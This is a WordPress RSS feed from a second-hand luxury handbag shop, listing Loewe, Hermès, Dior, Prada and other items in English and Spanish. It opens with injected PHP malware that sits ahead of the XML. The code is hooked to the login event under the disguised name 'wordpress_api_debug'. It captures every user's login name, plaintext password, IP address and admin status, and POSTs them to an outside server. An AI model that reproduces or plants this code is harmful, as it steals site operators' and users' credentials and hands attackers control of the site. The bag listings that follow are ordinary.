'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" > <channel> <title>Other Brands – CBL Bags https://www.cblbags.com/en/ Mon, 02 Aug 2021 06:56:10 +0000 en-US hourly 1 https://wordpress.org/?v=5.4.15 https://www.cblbags.com/wp-content/uploads/2018/07/favicon-100x100.png Other Brands – CBL Bags https://www.cblbags.com/en/ 32 32 Loewe bag https://www.cblbags.com/en/p/loewe-bag-24/ Wed, 17 Mar 2021 14:42:41 +0000 https://www.cblbags.com/?post_type=product&p=49195 This Loewe Vintage crocodile skin bag is waiting for you!

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
WE VUY AND SELL LUXURY SECOND HAND BAGS.

This elegant and exotic Loewe bag, crafted in Cognac color crocodile skin with gold tone hardware is made for Vintage lovers. It can be hand-held or worn over the shoulder or crossbody. It is odorless and in good overall vintage condition. Presents wear on corners and stains on reverse side of flap.(see pics) Includes dustbag and strap.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-23/ Wed, 17 Mar 2021 14:04:16 +0000 https://www.cblbags.com/?post_type=product&p=49162 Exquisite Loewe crocodile skin with gold tone hardware bag. For Vintage lovers!

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
 

WE BUY AND SELL LUXURY SECOND HAND BAGS.

This elegant and timeless Loewe bag is crafted in crocodile with gold tone hardware, especially for Vintage and exotic skin lovers. It is in good general vintage conditions. Odorless, it presents wear on corners and top trims as well as on the base (see pics). Includes dustbag.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-2/ Wed, 09 Dec 2020 10:59:15 +0000 https://www.cblbags.com/?post_type=product&p=46183 Always the Hermès signature of excellence! This Carré l'Arbre de Soie is made in lovely turquoise and blue colors.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
IF YOU WANT TO RENEW YOUR WARDROBE, CALL US. WE BUY YOUR HERMÈS ITEMS!

When you buy an Hermès scarf, you buy quality. On average, close to 27 colors are represented on each Carré. The name of the artist who designs them is printed on the scarf which gives your investment an added value. This l’Arbre de Soie Carré is  made in 100% silk and is signed by Antoine de Jacquelot. Its spring inspired botanical theme is represented by multicolor leaves and berries in bright turquoise and blues.  It is in very good condition, new. Includes box and exchange card.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Loewe Briefcase https://www.cblbags.com/en/p/loewe-document-holder/ Wed, 29 Apr 2020 20:12:24 +0000 https://www.cblbags.com/?post_type=product&p=34768 This Loewe Amazona 42 Briefcase is the perfect companion for all your important meetings.

La entrada Loewe Briefcase se publicó primero en CBL Bags.

]]>
WE BUY YOUR LOEWE BAGS. CONTACT US FOR APPOINTMENTS.

Loewe Amazona 42 Briefcase. This bag is crafted in burgundy leather with gold tone hardware. It’s ideal for safekeeping your documents and laptop and it can be worn on the shoulder or crossbody for comfort. It has a large external pocket on the back and the interior is spacious and nicely distributed. It is in very good condition. Includes dustbag, canvas strap, care guide.

 

La entrada Loewe Briefcase se publicó primero en CBL Bags.

]]>
Armani Clutch https://www.cblbags.com/en/p/armani-clutch/ Fri, 02 Dec 2016 17:45:29 +0000 https://www.cblbags.com/en/?post_type=product&p=10226 Nothing like a timeless accessory like this Alligator Whiskey Clutch signed by Armani.

La entrada Armani Clutch se publicó primero en CBL Bags.

]]>
For those looking for an unusual accessory, here is the chic solution. This stunning Armani clutch is the perfect accent for every evening outfit. Alligator leather, a deeply whisky color plus a satin interior make the most of this accessory. The lines of this bag are finished with a brown grosgrain. Overall, a minimalist touch with   a sophisticated flair.

 

 


La entrada Armani Clutch se publicó primero en CBL Bags.

]]>
Valentino Clutch https://www.cblbags.com/en/p/valentino-clutch-convertible-red-satin-pearl/ Tue, 29 Nov 2016 19:37:45 +0000 https://www.cblbags.com/en/?post_type=product&p=10060 Astonishing convertible clutch in red satin fabric with pearls and gems. You can wear it both by hand and on your shoulder. The perfect fit for the night to come. Dazzling.

La entrada Valentino Clutch se publicó primero en CBL Bags.

]]>
Valentino gives birth to this amazing convertible clutch made of red satin fabric and light gold metallic accents. The firm clasp opens as an ancient purse and keeps inside a very slim chain that, once you take it out, it allows you to carry the bag on your shoulder. The satin is elegantly pleated alongside the clutch and the fabric gathers in the upper part next to the opening, which is decorated with pearls and gems. The interior of the bag is also crafted of red satin and shows a slid pocket.

La entrada Valentino Clutch se publicó primero en CBL Bags.

]]>
Chanel bag https://www.cblbags.com/en/p/chanel-bag-62/ Thu, 29 Jul 2021 13:46:02 +0000 https://www.cblbags.com/?post_type=product&p=49622 Special for Chanel Timeless 2.55 lovers, this Rose Mermaid Iridescent Classic Double Flap is a must have!!

La entrada Chanel bag se publicó primero en CBL Bags.

]]>
TIME TO RENEW YOUR WARDROBE? WE BUY YOUR CHANEL BAGS

Chanel Rose Mermaid Iridescent Classic  Double FlapTimeless 2.55 MM. Crafted in quilted iridescent goatskin on exterior with gold tone hardware and lambskin interior. Never worn, includes dustbag and authenticity card.

La entrada Chanel bag se publicó primero en CBL Bags.

]]>
Celine bag https://www.cblbags.com/en/p/celine-bag-6/ Fri, 12 Feb 2021 11:18:45 +0000 https://www.cblbags.com/?post_type=product&p=46978 This Celine Vintage bag is never out of style. Great opportunity!

La entrada Celine bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL LUXURY SECOND-HAND BAGS.

Celine Cloth Monogram Vintage. Crafted in beige Cloth Monogram, brown leather trims and gold-tone hardware, this bag is in overall good vintage condition. Strap allows for comfortable shoulder wear. Odorless and includes C charm on zipper head.

La entrada Celine bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-41/ Fri, 29 Jan 2021 14:18:47 +0000 https://www.cblbags.com/?post_type=product&p=46707 Attention Vintage Hermès collectors! Atención, colecionistas de Hermès Vintage! This lovely Kelly 32 crafted in black crocodile is waiting for you.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS SECOND-HAND BAGS. CONTACT US.

Hermès Kelly 32 Vintage. Crafted in black crocodile skin with gold tone hardware, this Kelly is for Vintage lovers! It is in good vintage condition, considering it was issued c 1950 decade. For wear details please refer to photos. The handle is not original.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-39/ Fri, 11 Dec 2020 14:40:19 +0000 https://www.cblbags.com/?post_type=product&p=46284 If you are a Vintage collector , this Kelly 32 Retourné, in beautiful burgundy color, is for you!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
RENEW YOUR WARDROBE AND SELL US YOUR HERMÈS BAGS!

Hermès Kelly 32 Retourné Vintage. Crafted in soft box-calf leather, burgundy color with gold-tone hardware. Its casual look and soft rounded borders is a favorite among collectors of the brand’s style and savoir-faire, especially of the Kelly model. Odorless and in very good vintage condition. Includes dustbag, tirette, clochette, lock and keys.

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-38/ Thu, 03 Dec 2020 11:01:31 +0000 https://www.cblbags.com/?post_type=product&p=46155 This Hermès Evelyne TGM is your ideal travel or city companion! Follow the trend!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL SECOND-HAND LUXURY BAGS. IF YOU WANT TO SELL YOUR HERMÈS CONTACT US!

Hermès Evelyne TGM. This elegant bag is crafted in exquisite Gold Taurillon Clemence leather with palladium hardware. It is one of the brand’s signature bags, sought after by both modern-day men and women who love its practical design and excellent craftsmanship . It opens to a spacious suede interior, and also has an exterior back pocket complete with a push-button strap to ensure quick access to important essentials. Its front presents a perforated H and it has an adjustable canvas strap that allows for shoulder or crossbody wear. Includes dustbag. It is in very good general condition except for some marks on its back exterior leather, very slight wear marks on corners, wear marks on interior top borders and a small stain inside. (see pics)

 

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-20/ Tue, 17 Nov 2020 10:27:45 +0000 https://www.cblbags.com/?post_type=product&p=44769 This Unisex Loewe 43 personifies the House's style and craftsmanship It's a must-have for the modern executive.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
IF YOU DECIDE TO RENEW YOUR WARDROBE, WE BUY YOUR LOEWE BAGS. CONTACT US.

Loewe Amazona 43. This bag is made to order for those who lives  and travel in style.  Can be worn in hand, shoulder or crossbody. Two spacious top zippered compartments. Beautifully crafted in black suede with brown trims and silvertone hardware. In perfect condition, never worn. Includes, dustbag and strap.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-18/ Fri, 02 Oct 2020 16:34:04 +0000 https://www.cblbags.com/?post_type=product&p=43937 This elegant and beautifully crafted Loewe bag is ideal for all seasons, city or travel!

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
IT’S TIME FOR A CHANGE. SELL US YOUR LOEWE BAGS!

Loewe Amazona 75 Large. Beautifully crafted in Loewe’s superb black, logo embossed calfskin and palladium hardware. Ideal city and travel companion, fit for any season! In very good condition, never worn. Includes Dustbag, Small Leather Goods Certificate, Care Guide, Barcode Sticker, Loewe Leather Booklet.

 

 

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Louis Vuitton bag https://www.cblbags.com/en/p/louis-vuitton-bag-80/ Mon, 07 Sep 2020 18:48:43 +0000 https://www.cblbags.com/?post_type=product&p=42826 Don't miss the opportunity to own this trendy and very chic LV Noé Nano!

La entrada Louis Vuitton bag se publicó primero en CBL Bags.

]]>
Louis Vuitton Nano Noé. Crafted in the brand’s classic Epi leather and in a spectacular pink with silvertone hardware. This very chic little bag combines color, style and excellent craftsmanship. It’s the perfect accessory that will make you stand out wherever you go. For crossbody wear thanks to its very long strap. It is in very good condition. Includes original box and gift ribbons.

 

 

 

 

 

 

La entrada Louis Vuitton bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-17/ Wed, 29 Jul 2020 12:25:13 +0000 https://www.cblbags.com/?post_type=product&p=42704 This Loewe Amazona 36 is perfect for the modern woman who appreciates de craftsmanship and style of the House!

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
IF YOU WANT TO RENEW YOUR WARDROBE, WE BUY SECOND-HAND LOEWE BAGS. CONTACT US!

LOEWE Amazona 36. Timeless, elegant and practical, this iconic model is crafted in brown suede with leather trims and silvertone hardware. Its size is ideal for city or travel wear, with plenty of interior space for all your essentials. Includes interior zip pocket. In good condition, except for general exterior wear marks. Includes tirette, clochette, keys and lock.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Dior bag https://www.cblbags.com/en/p/dior-bag-10/ Thu, 16 Jul 2020 19:25:29 +0000 https://www.cblbags.com/?post_type=product&p=42321 Dior's Book Tote Oblique Blue is elegant and practical. Ideal for city wear and is also the perfect travel companion!

La entrada Dior bag se publicó primero en CBL Bags.

]]>
WE BUY YOUR DIOR BAGS. EXPERT APPRAISALS.

DIOR Book Tote Oblique Blue. This large Tote bag is an excellent example of the brand’s exquisite elegance and is crafted in navy blue and white cloth embroidered with the iconic Dior Oblique. It can be worn in hand or on the shoulder. Original creation signed by Dior’s artistic director, Maria Grazia Chiuri. Across its front the name of the firm is presented in bold letters. Spacious interior. It is in excellent condition, never worn. Includes dustbag, Dior book and authenticity card.

 

 

 

 

La entrada Dior bag se publicó primero en CBL Bags.

]]>
Bolso Prada https://www.cblbags.com/en/p/bolso-prada/ Mon, 08 Jun 2020 15:32:52 +0000 https://www.cblbags.com/?post_type=product&p=35266 This Prada Mini Promenade has the brand's undisputed seal of elegance. Superbly crafted, you can wear it year-round!

La entrada Bolso Prada se publicó primero en CBL Bags.

]]>
Prada Promenade Bag. This elegant and compact bag is crafted in the brand’s iconic Saffiano leather. Its color, a light grey called Pomice, with goldtone hardware, adapts easily to any season. It has rounded handles and comes with a detachable  and adjustable strap that  allows for shoulder or crossbody use. Two zippered compartments  make for a nicely distributed interior. It is in very good condition, never worn. Includes  authenticity card, barcode card, dustbag, tirette, clochette and key ring, strap with dustbag.

 

 

 

 

 

La entrada Bolso Prada se publicó primero en CBL Bags.

]]>
Loewe Backpack https://www.cblbags.com/en/p/loewe-backpack/ Fri, 05 Jun 2020 16:47:58 +0000 https://www.cblbags.com/?post_type=product&p=35285 Mochila Yago de Loewe. Es el accesorio ideal para aquellos fines de semana con amigos!

La entrada Loewe Backpack se publicó primero en CBL Bags.

]]>
Loewe Yago Backpack. Beautifully crafted in the supple, black calfskin that so identifies the brand. It’s a must-have for those leisure weekends. It’s lightweight, takes the shape of  its contents and fits comfortably on your back. It is in very good condition, except for a small stain on the exterior front. Includes dustbag and care guide.

 

 

 

 

La entrada Loewe Backpack se publicó primero en CBL Bags.

]]>
Bottega Veneta Bag https://www.cblbags.com/en/p/bottega-veneta-bag/ Wed, 03 Jun 2020 15:22:42 +0000 https://www.cblbags.com/?post_type=product&p=35137 This  Bottega Veneta Garda Intrecciato bag marks the firm's traditional elegance and marvelous craftsmanship.

La entrada Bottega Veneta Bag se publicó primero en CBL Bags.

]]>
Bottega Veneta Garda Medium Intrecciato bag in black lambskin. It’s the ideal city bag, spacious and the perfect fit for any season. Opens to a dark taupe suede lining with one zippered pocket against the back and a cell-phone pocket against the front. It is in very good condition except for very slight wear marks on two corners. Includes dustbag.

 

 

La entrada Bottega Veneta Bag se publicó primero en CBL Bags.

]]>
Prada Briefcase https://www.cblbags.com/en/p/prada-briefcase/ Sat, 25 Apr 2020 17:02:43 +0000 https://www.cblbags.com/?post_type=product&p=34726 Prada offers you this elegant briefcase, crafted in exquisite Saffiano leather, to keep your work documents  safe and in order.

La entrada Prada Briefcase se publicó primero en CBL Bags.

]]>
WE BUY YOUR PRADA BAGS. CONTACT US.

Prada Saffiano Leather Briefcase. This splendid unisex briefcase is crafted in black with silver tone hardware. It’s modern, elegant and a must for today’s executive. Double-rolled handles and  strap allow for hand-held or crossbody use. It has a zippered exterior front compartment and back strap that secures briefcase to luggage.  Plenty of wonderfully distributed interior space. In very good condition. Includes detachable strap and name tag.

 

 

 

La entrada Prada Briefcase se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-16/ Sun, 19 Apr 2020 14:39:39 +0000 https://www.cblbags.com/?post_type=product&p=34648 This lovely Loewe Amazona 29 handbag is crafted in metallic brown leather. Its size is practical but with a spacious interior. In very good condition.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
WE BUY YOUR LOEWE BAGS.

This lovely and practical Loewe Amazona 29 handbag is crafted in brown metallic leather with gold tone hardware and rounded handles. It is in very good condition. It is customized with the initials M.C.M. engraved in the interior below the firm’s logo. Includes dustbag, tirette, clochette, keys, lock.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
PRADA BAG https://www.cblbags.com/en/p/prada-bag-9/ Sun, 19 Apr 2020 10:07:05 +0000 https://www.cblbags.com/?post_type=product&p=34613 This Prada Double Tote bag is beautifully crafted in dual tone  Mare Báltico Saffiana leather is ideal for your Summer wardrobe.

La entrada PRADA BAG se publicó primero en CBL Bags.

]]>
WE BUY YOUR PRADA BAGS.

This Prada Double Tote M is crafted in the firm’s exquisite and iconic Saffiano leather and gold tone hardware. This model comes in a lovely, summer blue Mare Báltico. Its rounded handles, calfskin interior and name tag are crafted in dual-tone blues. It can also be worn  crossbody thanks to its detachable strap. The interior is roomy with a large flap pocket,  and the external side clasps close to protect all your essentials. In very good condition and includes dustbag, authenticity card, detachable strap with dustbag, name tag and booklet.

 

 

La entrada PRADA BAG se publicó primero en CBL Bags.

]]>
Billetero Dior https://www.cblbags.com/en/p/billetero-dior/ Fri, 06 Mar 2020 10:53:10 +0000 https://www.cblbags.com/p/billetero-dior/ Encantador billetero de la colección Dior Cruise 2019 con motif animal. Compacta y un interior bien distribuido.

La entrada Billetero Dior se publicó primero en CBL Bags.

]]>
COMPRAMOS TU PEQUEÑA MARROQUINERÍA DIOR

DIOR Toile de Jouy Wallet. Billetero confeccionado en piel de becerro. Representa la colección Cruise 2019 con impresión de temas animales. A pesar de su tamaño compacto, el interior está muy bien distribuido con espacio para billetes, monedas y tarjetas. Está en excelentes condiciones, nunca usado. Incluye funda guardapolvo y Charm con el icónico D.I.O.R.

 

 

La entrada Billetero Dior se publicó primero en CBL Bags.

]]>
Prada Wallet https://www.cblbags.com/en/p/billetero-prada/ Fri, 06 Mar 2020 10:21:32 +0000 https://www.cblbags.com/?post_type=product&p=34078 Este billetero Prada Continental tiene amplio espacio para billetes, monedas y hasta 12 porta-tarjetas.

La entrada Prada Wallet se publicó primero en CBL Bags.

]]>
WE BUY YOUR PRADA SMALL LEATHER GOODS

PRADA Continental Wallet. Crafted in beige Saffiano Leather with gold tone hardware. Plenty of room for your cash, zippered compartment for coins and 12 slots for credit cards.- It’s in correct conditions, with wear on corners, loss of color on exterior front and back leather. Interior is in very good condition.

La entrada Prada Wallet se publicó primero en CBL Bags.

]]>
Bolso Dior https://www.cblbags.com/en/p/bolso-dior-2/ Tue, 03 Mar 2020 18:24:00 +0000 https://www.cblbags.com/?post_type=product&p=34007 J'ADIOR, a showcase bag with Dior's undeniable style.

La entrada Bolso Dior se publicó primero en CBL Bags.

]]>
WE BUY YOUR DIOR BAGS.

DIOR J’ADIOR.  Crafted in navy blue, large-grain calfskin with aged gold tone hardware. Its chain link strap with the CD logo allows in hand and on the shoulder wear. Features a slot handclasp with metal plated J’ADIOR signature and full front flap. Opens to a blue suede interior with flap and slip pockets. In very good condition, except for small interior stain. Includes dustbag.

 

La entrada Bolso Dior se publicó primero en CBL Bags.

]]>
Bolso Dior https://www.cblbags.com/en/p/bolso-dior/ Mon, 02 Mar 2020 14:25:13 +0000 https://www.cblbags.com/?post_type=product&p=33928 My ABCDior represents the style and elegance of the House. Crafted in striking red, it's perfect for the upcoming season.

La entrada Bolso Dior se publicó primero en CBL Bags.

]]>
WE BUY YOUR DIOR BAGS. EXPERT APPRAISALS.

 

My ABCDior. A lovely plus to the classic Lady Dior, this bag crafted in quilted red lambskin, embodies Dior’s elegance. Its “cannage” stitching design is instantly recognizable and you can now customize your bag with up to 6 initials on its strap. In very good condition. Includes dustbag, quality guarantee card, care guide, signature D.I.O.R charms with 2 protective dustbags, strap with bee pin.

La entrada Bolso Dior se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-15/ Tue, 25 Feb 2020 16:07:30 +0000 https://www.cblbags.com/?post_type=product&p=33858 This Loewe Hammock bag will accompany you from morning to night. Its innovative design is both practical and elegant.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
SELL US YOUR LOEWE BAGS! EXPERT APPRAISALS.

Versatile and very trendy, the Hammock is  multifunctional and elegant. It has become an all-time favorite among Loewe lovers, thanks to its unique design, created by the firm’s Creative Director, Jonathan Anderson. It can be worn hand-held, on the shoulder or crossbody.  It is crafted in  Classic Calfskin, herringbone-patterned Cotton-Canvas lining with two internal slip compartments, hook fastening at open top, folded zip sided, handy exterior zip pocket, removable adjustable shoulder strap, black hand-edge painting, and Loewe’s Anagram embossed to tone. It is in excellent condition, new. Includes dustbag, removable strap, care guide and materials card.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-14/ Tue, 25 Feb 2020 10:57:07 +0000 https://www.cblbags.com/?post_type=product&p=33819 This Loewe Gate Bag embodies the firm's savoir-faire and elegant craftsmanship.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
SELL US YOUR LOEWE BAGS! WE BUY AND SELL SECOND-HAND LUXURY BAGS.

LOEWE Gate Bag. This sleek saddle-shaped crossbody bag is crafted in Rust color boxcalf and gold tone hardware. It embodies Loewe’s traditional savoir-faire and belongs to Jonathan Anderson’s 2018 collection. Large, exterior slit pocket and embossed Loewe anagram.This bag owes its name to the front flap that pulls in under the iconic knotted belt and side-latched metallic pin with a flirty dangling leather strip. It opens to a gold suede lined interior with plenty of room for all your essentials. It’s in excellent condition, never worn. Includes dustbag, identification card, care guide, materials booklet.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Dior bag https://www.cblbags.com/en/p/dior-bag-8/ Mon, 10 Feb 2020 13:01:21 +0000 https://www.cblbags.com/?post_type=product&p=33272 This Dior 30 Montaigne is a must for the next Spring/Summer season!

La entrada Dior bag se publicó primero en CBL Bags.

]]>
RENEW YOUR WARDROBE! WE BUY YOUR LUXURY BAGS.

DIOR 30 Montaigne. Its exterior is crafted in pale rose calfskin box and flexible calfskin and it is lined in soft lambskin. Gold tone hardware and CD clasp on the strap.  30 Montaigne embossed on the back, with slide pocket. Easy to wear on the shoulder or crossbody thanks to its adjustable strap. In very good condition. Includes dustbag, authenticity card and care guide.

La entrada Dior bag se publicó primero en CBL Bags.

]]>
Bvlgari bag https://www.cblbags.com/en/p/bvlgari-bag/ Fri, 07 Feb 2020 18:35:38 +0000 https://www.cblbags.com/?post_type=product&p=33273 Bvlgari Serpenti Diamond Blast: versatile, elegant and ready to accompany you on all your events!

La entrada Bvlgari bag se publicó primero en CBL Bags.

]]>
BEGIN THE NEW YEAR RENEWING YOUR WARDROBE AND SELL US THE BAGS YOU DON’T USE!

Bvlgari Serpenti Diamond Blast. Crafted in the softest white calfskin, a diamond-shaped three-dimensional matelassé pattern with silver tone hardware. Its signature snake-head closure is crafted in black and white enamel. It can be worn on the shoulder or crossbody. It is in very good condition. Includes dustbag, small mirror, authenticity card and authenticity booklet, care guide, rain protector, detachable leather strap.

La entrada Bvlgari bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-13/ Fri, 17 Jan 2020 14:05:32 +0000 https://www.cblbags.com/?post_type=product&p=32594 The Loewe Puzzle is the bag of the moment. Easy to wear, this Mini model is new!

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
IT’S TIME TO RENEW YOUR WARDROBE! WE BUY YOUR LUXURY BAGS.

This iconic Loewe Puzzle first designed by Jonathan Anderson is now available in its Mini size. Crafted in soft tan color calfskin with silver tone hardware, its innovative cubic design is made up of individual pieces trimmed in black and cut with the utmost precision. It can be hand-worn, on the shoulder or crossbody. It is in very good condition, new. Includes strap.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-12/ Tue, 14 Jan 2020 16:58:15 +0000 https://www.cblbags.com/?post_type=product&p=32382 This Loewe Vintage clutch is crafted in burgundy color alligator skin and is the perfect accessory for your important events.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
WE BUY YOUR LUXURY BAGS. CONTACT US. CUSTOMIZED ATTENTION AND EXPERT APPRAISALS.

This very elegant Vintage Loewe  clutch is crafted in burgundy colored Alligator skin with gold tone hardware. It has a zippered front pocket and another zippered compartment in its suede-lined interior. In good condition, except for light wear stain in the interior and loss of patina on zipper head. Includes clutch dustbag and small cardholder also crafted in alligator with its own dustbag.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Prada Wallet https://www.cblbags.com/en/p/prada-wallet/ Tue, 14 Jan 2020 14:51:23 +0000 https://www.cblbags.com/?post_type=product&p=32380 If you're already dreaming of Summer, this Prada Wallet is a must! Crafted in vibrant orange and turquoise. In perfect condition.

La entrada Prada Wallet se publicó primero en CBL Bags.

]]>
WHY NOT BEGIN THE YEAR RENOVATING YOUR WARDROBE? WE BUY YOUR LUXURY BAGS.

Dreaming of next Summer? This PRADA Saffiano Lux Beach Wallet is a must-have. Its exterior is crafted in vibrant orange and turquoise leather and the interior space is ideally distributed with credit card slots and zipped compartment and long slots for bills.. In very good condition, new. Comes with authenticity card.

La entrada Prada Wallet se publicó primero en CBL Bags.

]]>
Prada Coin Purse https://www.cblbags.com/en/p/monedero-prada/ Fri, 10 Jan 2020 11:58:07 +0000 https://www.cblbags.com/?post_type=product&p=32332 This  Prada Saffiano Lux Beach coin purse is ideal to keep your pocket change handy in Summer!

La entrada Prada Coin Purse se publicó primero en CBL Bags.

]]>
WE BUY YOUR LUXURY BAGS. EXPERT APPRAISALS.

This Prada Saffiano Lux Beach Mini coin purse is ideal for your next summer vacations. The exterior is crafted in vibrant orange and turquoise color leather and the interior is lined in soft calfskin. Comes with authenticity card and is in very good condition.

La entrada Prada Coin Purse se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-11/ Fri, 03 Jan 2020 16:43:18 +0000 https://www.cblbags.com/?post_type=product&p=32164 Elegant but fun, Loewe's pony hair leopard print is an impressive show of craftsmanship!

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
 

 

 

 

 

 

 

 

 

AT CBL BAGS WE BUY AND SELL LUXURY SECOND HAND BAGS

This impressive bag is part of Loewe’s animal print collection. Crafted in leopard print pony hair, black leather trims and gold tone hardware. Its interior is very spacious, wonderful for city and travel wear. It is in very good condition, like new, except for tiny hairline scratches on the lock. Comes with tirette, keys and lock.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Dior bag https://www.cblbags.com/en/p/dior-bag-7/ Fri, 03 Jan 2020 11:48:17 +0000 https://www.cblbags.com/?post_type=product&p=32131 Forever Dior! This burgundy color Lady Dior crafted in quilted lambskin is marked by the couture spirit of the House.

La entrada Dior bag se publicó primero en CBL Bags.

]]>
CBL BAGS BUYS YOUR DIOR BAGS. EXPERT APPRAISALS.

This Lady Dior is marked by the couture spirit of the House. Crafted by hand in burgundy color quilted lambskin with the traditional Cannage stitching. It comes with silver tone hardware, Dior logo charm and is in very good condition, except for slight mark on one of the handles and a very slight scratch on the top exterior leather. Preserves some protective plastics.-

La entrada Dior bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag-6/ Sat, 21 Dec 2019 17:23:17 +0000 https://www.cblbags.com/?post_type=product&p=31965 This Lady Dior bag is marked with the brand's couture spirit . It comes with all its extras and is in very good condition.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
RENEW YOUR WARDROBE AND SELL US YOUR LUXURY BAGS!

Lady Dior is marked by the couture spirit of the House. Crafted by hand in Rose Poudre Quilted Lambskin with the traditional Cannage stitching. It comes with pale gold hardware, Dior logo charm and shoulder/crossbody strap. In very good condition, except for soft wear marks on corners and small make-up stain inside. Includes box, ribbons, strap, charm, care booklet, authenticity card and two dustbags.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Christian Louboutin Bag https://www.cblbags.com/en/p/christian-louboutin-bag-2/ Fri, 20 Dec 2019 15:01:58 +0000 https://www.cblbags.com/?post_type=product&p=31839 Louboutin specializes in making you feel special and unique. His Paloma Crazy Love honors its name with its multicolor leather print, silver tone hardware and bright red interior.

La entrada Christian Louboutin Bag se publicó primero en CBL Bags.

]]>
QUIERES VENDER TUS BOLSOS DE LUJO? CONTÁCTANOS.

